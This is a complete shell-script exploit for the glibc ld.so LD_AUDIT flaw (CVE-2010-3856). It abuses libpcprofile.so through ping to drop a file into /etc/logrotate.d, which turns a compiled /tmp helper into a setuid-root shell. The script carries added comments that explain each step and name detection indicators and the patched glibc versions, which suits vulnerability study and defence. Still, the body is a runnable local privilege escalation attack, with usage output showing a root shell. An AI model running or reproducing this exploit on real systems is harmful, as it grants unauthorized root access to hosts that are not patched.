#!/bin/sh
#
# $Id: raptor_ldaudit2,v 1.2 2011/02/04 11:04:36 raptor Exp $
#
# raptor_ldaudit2 - another glibc ld.so exploit (logrotate)
# Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment
# variable to reference dynamic shared objects (DSOs) as audit objects, which
# allows local users to gain privileges by leveraging an unsafe DSO located in
# a trusted library directory, as demonstrated by libpcprofile.so
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# This exploit uses the logrotate attack vector. See also the cron.d version
# available at: http://www.0xdeadbeef.info/exploit/raptor_ldaudit
#
# Usage:
# $ chmod +x raptor_ldaudit2
# $ ./raptor_ldaudit2
# [...]
# Everything looks fine.
# Just wait until logrotate is run and check /tmp/pwned.
# [...]
# $ /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1#
# [don't forget to delete /tmp/pwned* and /var/log/runme*!]
#
# Vulnerable platforms:
# Slackware 13.1 [tested]
# openSUSE 11.3 [untested]
# Fedora Core 13 [untested]
# RHEL/CentOS 5 [untested]
# Ubuntu 10 [untested]
# [...]
#
echo "raptor_ldaudit2 - another glibc ld.so exploit (logrotate)"
echo "Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>"
echo
# prepare setuid shell helper to circumvent bash checks
# Step 1: a tiny C program that switches to uid/gid 0 and runs /bin/sh. It is
# compiled here as the current user and is harmless on its own; it only
# becomes a privilege boundary crossing once the logrotate "firstaction"
# further down chowns it to root and sets mode 4755.
# Defender note: a root-owned setuid binary under /tmp is a strong host
# indicator on its own. The header names /tmp/pwned* as the leftover
# artifacts, which is exactly what a file-integrity or setuid-scan should
# surface.
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
# Abort if the helper did not build; nothing below is useful without it.
if [ $? -ne 0 ]; then
echo "Error: Problems compiling setuid shell helper, check your gcc."
exit 1
fi
# create a fake log file in /var/log
# Step 2: the CVE-2010-3856 primitive described in the header. LD_AUDIT makes
# ld.so load libpcprofile.so from a trusted library directory into the ping
# process, and the observable effect used here is that a file appears at the
# PCPROFILE_OUTPUT path. ping's own output is discarded. The script does not
# check ping's privileges itself -- presumably it is installed setuid on the
# listed platforms, as the vulnerability requires; confirm for the host being
# assessed.
# Mitigation: the header gives the fixed glibc versions (2.11.3 / 2.12.2);
# updating glibc is the only real fix, since the DSO lives in a trusted path.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/var/log/runme" ping 2>/dev/null
# do the magic!
runme="/etc/logrotate.d/runme"
# umask 0 so the file created by the next command is not stripped of any
# permission bits; the echo redirections below depend on being able to
# overwrite it as the current user.
umask 0
# Step 3: same primitive, this time dropping a file into the logrotate
# configuration directory. Detection point: a new, unexpected entry in
# /etc/logrotate.d (or a process with LD_AUDIT/PCPROFILE_OUTPUT set in its
# environment, if process auditing captures env) is the signal for this
# vector.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
# If $runme is empty or absent, the LD_AUDIT step did not take (patched
# glibc, no libpcprofile.so, or ping unusable as the vector) -- give up.
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "Error: Not vulnerable or wrong attack vector? See comments."
exit 1
fi
# build the logrotate script
# Step 4: overwrite the dropped file with a logrotate stanza for the fake log
# /var/log/runme. "daily" and "size=0" make it eligible on the next run; the
# "firstaction" commands are executed by logrotate itself, so they run with
# logrotate's privileges -- root, going by the uid=0 shell in the usage
# block above. That is what turns /tmp/pwned into a setuid-root binary. The
# stanza deletes itself, so the /etc/logrotate.d entry is short-lived while
# /tmp/pwned and /var/log/runme persist (see the cleanup reminder in the
# header).
echo "/var/log/runme {" > $runme
echo "daily" >> $runme
echo "size=0" >> $runme
echo "firstaction" >> $runme
echo "chown root /tmp/pwned;chmod 4755 /tmp/pwned;rm -f $runme" >> $runme
echo "endscript" >> $runme
echo "}" >> $runme
# legen -- wait for it -- dary!
# Step 5: nothing further happens until logrotate's next scheduled run; the
# script does not verify the outcome, it only reports that setup completed.
echo "Everything looks fine."
echo "Just wait until logrotate is run and check /tmp/pwned."